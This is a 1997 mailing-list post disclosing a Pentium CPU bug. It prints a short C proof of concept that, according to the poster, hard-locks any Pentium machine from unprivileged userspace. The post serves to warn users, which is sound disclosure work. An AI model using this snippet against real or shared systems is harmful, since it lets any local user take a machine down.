Subject: WARNING: Serious Pentium Bug
From: [email-masked] (Anonymous)

7 Nov 1997 19:32:41 -0800
Message-ID: <[email-masked]>
To: [email-masked]

There is a SERIOUS bug in all pentium CPUs. The following 
code will crash any machine running on a pentium CPU, MMX or no 
MMX, any speed, regardless of OS (crash as in instant seize, hard 
reboot the only cure):

char x [5] = { 0xf0, 0x0f, 0xc7, 0xc8 };

main ()
{
       void (*f)() = x;
       f();
}

This require no special permissions to run, it works fine with
average-joe-userspace permissions. I have verified this, it works.
Demand a new CPU from Intel.

-
For help on using this list (especially unsubscribing), send a message to
"[email-masked]" with one line of text: "help".